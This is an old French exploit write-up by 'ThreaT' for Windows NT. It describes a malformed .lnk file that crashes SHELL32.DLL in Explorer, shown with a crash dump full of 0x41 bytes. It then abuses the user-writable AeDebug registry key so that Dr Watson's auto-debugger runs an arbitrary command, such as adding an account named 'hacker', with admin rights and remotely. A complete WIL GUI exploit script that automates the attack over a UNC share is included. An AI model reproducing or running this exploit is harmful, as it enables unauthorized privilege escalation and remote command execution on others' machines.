------------ [ ThreaT ] -------------------------------------------------------------------- ----------------------------------------------------------- y'a pas de raison que seb fasse une demo technique tout seul ;) ------------------------------------------------------------ objet: exploit NEWZ system: windows NT (pour ceux que sa interressent ;) decouvert: aujourd'hui (8H45) auteur: ThreaT possibilté: executer une commande arbitraire sur un serveur detail: *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* en premier lieu, en m'amusant avec une becane 98, j'ai decouvert quelque chose d'interressant avec les .lnk c:\>cygwin ThreaT@desstt41 ~ $ echo $(perl -e 'print "A" x 16000') > c:\a.txt $ exit c:\>copy c:\windows\bureau\accrob~1.lnk+c:\a.txt test.lnk ----------BOOM-------------- EXPLORER a causé une défaillance de page dans le module SHELL32.DLL à 018f:7fcb3d96. Registres : EAX=00438733 CS=018f EIP=7fcb3d96 EFLGS=00010202 EBX=00000010 SS=0197 ESP=012cef14 EBP=012cf028 ECX=00000000 DS=0197 ESI=00000104 FS=1c6f EDX=00000077 ES=0197 EDI=bff773a9 GS=0000 Octets à CS : EIP : 66 83 38 00 74 56 ff 75 0c ff d7 83 7d 10 00 8b État de la pile : 012cf1a4 004345cd 00000000 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 --------------------------------------------- hum hum! c:\>net use * \\test\aaa D: connecté à \\test\aaa c:\>copy c:\windows\bureau\test.lnk d:\ 1 fichier(s) copié(s) ----------BOOM------------ DRWATSON qui démarre à distance du cache :) --------------------------- pour ceux qui sont peut famillier avec windows NT, l'appelle de drwatson est parametré dans la bdr à la clé HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion avec les valeurs [debugger] et [auto] et cette clé et modifiable par un utilisateur simple :) ce qui veut dir que si je remplace la valeur de [debugger] par cmd /c "net user hacker hacked /add" ainsi que [auto] par 1, que je balance sur un repertoire writable mon lnk mal former et que c'est l'administrateur qui est loguer, notre commande seras executé en tant qu'admin alors que nous ne possedont qu'un simple utilisateur, et surtout, la commande est executé, à DISTANCE :) pour les flemouzes je vous est fait un exploit avec gui en wil, 'Click & hack Rulaize' (pourquoi tu soupir seb?) ****************************** WIL exploit code ******************************* addextender ("wwwnt34i.dll") path=dirget () errormode (@off) :debut exploitFormat=`WWWDLGED,5.0` exploitCaption=`sh32&bdr Xploit by ThreaT` exploitX=141 exploitY=96 exploitWidth=122 exploitHeight=90 exploitNumControls=10 exploit01=`0,4,52,DEFAULT,STATICTEXT,DEFAULT," UNC share writable : "` exploit02=`2,18,50,DEFAULT,STATICTEXT,DEFAULT," Domain\utilistateur :"` exploit03=`16,32,36,DEFAULT,STATICTEXT,DEFAULT," Password :"` exploit04=`0,46,52,DEFAULT,STATICTEXT,DEFAULT,"Commande arbitraire :"` exploit05=`52,2,64,DEFAULT,EDITBOX,unc,""` exploit06=`52,16,64,DEFAULT,EDITBOX,user,""` exploit07=`52,30,64,DEFAULT,EDITBOX,pass,""` exploit08=`52,44,64,DEFAULT,EDITBOX,command,""` exploit09=`2,60,116,DEFAULT,PUSHBUTTON,DEFAULT,"&Xploit it",1` exploit10=`30,74,64,DEFAULT,PUSHBUTTON,DEFAULT,"&Quit",2` ButtonPushed=Dialog("exploit") switch buttonpushed case 1 boxopen ("sh32&bdr exploit working...","Connexion a l'UNC % unc%...") wntadddrive (user,pass,unc,"z:",@false) if lasterror () == 499 message ("Erreur!", "connexion a %unc% impossible") goto debut endif boxtext ("mise en place de la commande arbitraire dans la bdr...") data="debugger" assign=command for i = 1 to 2 regsetex (regopenkey (regconnect (strsub (unc,1,strscan (unc,"\",3,@FWDSCAN) - 1 ),@regmachine),"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug"),"[%data%]",assign,@tab,"1") data="auto" assign="1" next boxtext ("envoie du fichier link crash...") filecopy ("%path%\xploit.bin","z:\win.lnk",@false) boxshut () message ("terminer","sh32.dll&bdr xploit work successfull!") exit **************************** end of code **************************** faute d'orthographe fournie avec certificat d'authenticité have fun ;)